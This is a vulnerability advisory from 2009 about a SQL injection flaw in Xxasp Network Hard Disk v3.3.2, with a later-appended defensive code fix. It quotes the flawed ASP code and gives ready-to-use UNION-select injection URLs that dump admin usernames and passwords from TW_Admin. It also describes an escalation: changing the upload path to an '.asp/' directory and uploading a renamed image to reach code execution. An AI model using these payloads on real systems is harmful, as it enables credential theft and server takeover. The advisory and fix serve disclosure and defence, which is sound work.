Xxasp Network Hard Disk v3.3.2 SQL injection 0day - vulnerability warning - the black bar safety net

2009-11-29T00:00:00
ID MYHACK58:62200925444
Type myhack58
Reporter Anonymous
Modified 2009-11-29T00:00:00

Description

Xxasp Network Hard Disk v3.3.2 SQL injection 0day

I will not introduce the system itself. The vulnerability affects the files MyFiles.asp and ShareList.asp; I take ShareList.asp as the example for a brief analysis. The code is as follows:

```vbscript
Dim MyOrderBy,MyCondition,MyTopField,SearchType,SearchCondition
SearchType=Trim(Request("SearchType"))
SearchCondition=Trim(Request("SearchCondition")) ' the injection point
If SearchType="" Then SearchType="BaseSearch"
If SearchCondition="" Then SearchCondition="1"
MyTopField=""
Select Case SearchType
    Case "BaseSearch"
        Select Case SearchCondition
            Case "2"
                MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime," & SqlNowString & ")<25"
            Case "3"
                MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',F_AddTime," & SqlNowString & ")<3"
            Case "4"
                MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime," & SqlNowString & ")<7"
            Case "5"
                MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime," & SqlNowString & ")<21"
            Case "6"
                MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime," & SqlNowString & ")<1"
            Case "7"
                MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime," & SqlNowString & ")<3"
            Case "8"
                MyTopField="Top 100 ":MyOrderBy="A.F_DownloadTimes Desc":MyCondition=""
            Case "9"
                If ClsPub.TW_Config(42)<=1 Then
                    MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime," & SqlNowString & ")<25"
                Else
                    MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime," & SqlNowString & ")<" & ClsPub.TW_Config(42)
                End If
            Case "10"
                If ClsPub.TW_Config(42)<=1 Then
                    MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime," & SqlNowString & ")>25"
                Else
                    MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime," & SqlNowString & ")>" & ClsPub.TW_Config(42)
                End If
            Case Else
                MyOrderBy="A.F_AddTime Desc":MyCondition=""
        End Select
    Case "SearchFileType"
        If SearchCondition<>"1" Then
            ' if SearchCondition is not "1", it goes straight into the SQL query
            MyOrderBy="A.F_AddTime Desc":MyCondition="A.F_Ext='" & Lcase(SearchCondition) & "'"
        Else
            MyOrderBy="A.F_AddTime Desc":MyCondition=""
        End If
' excerpt ends here
```

Exploit: after registering and logging in:

```
http://www.xxx.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
```

Log in to the admin back end and, under basic system settings, change the file save path to one containing `.asp/`. Then go back to the front end and upload an image with a modified suffix; the following statement lists the file's address:

```
http://www.xxx.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,F_Path,13,14,15,16,17 from TW_FilesList where '1'='1
```

As shown in the figure.
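A hardened form of the `SearchFileType` branch analysed above, as an added example that is not part of the original advisory or the Xxasp code base: the extension is checked against a strict allowlist pattern and then bound as a query parameter instead of being concatenated into `MyCondition`. `Conn` (an already-open ADODB.Connection), the helper names `SafeExt` and `ListByExt`, the simplified select list and the mapping of alias `A` to `TW_FilesList` are assumptions.

```vbscript
<%
' Added example, not Xxasp code. Conn is a hypothetical, already-open
' ADODB.Connection; column names are the ones quoted in the advisory,
' and the alias A = TW_FilesList is an assumption.
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

' Accept only a short alphanumeric file extension; return "" otherwise.
Function SafeExt(ByVal raw)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[a-z0-9]{1,10}$"
    raw = LCase(Trim(raw))
    If re.Test(raw) Then
        SafeExt = raw
    Else
        SafeExt = ""
    End If
End Function

' Run the extension filter with the value bound as a parameter, so
' quotes in the input can never terminate the string literal.
Function ListByExt(Conn, ByVal ext)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT A.F_Path FROM TW_FilesList A " & _
                      "WHERE A.F_Ext = ? ORDER BY A.F_AddTime DESC"
    cmd.Parameters.Append cmd.CreateParameter("ext", adVarChar, adParamInput, 10, ext)
    Set ListByExt = cmd.Execute
End Function

Dim ext, rs
ext = SafeExt(Request("SearchCondition"))
If ext = "" Then
    ' Reject anything that is not a plain extension instead of querying.
    Response.Status = "400 Bad Request"
    Response.End
End If
Set rs = ListByExt(Conn, ext)
%>
```

The same two controls apply to MyFiles.asp, which the advisory names as affected by the same flaw.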
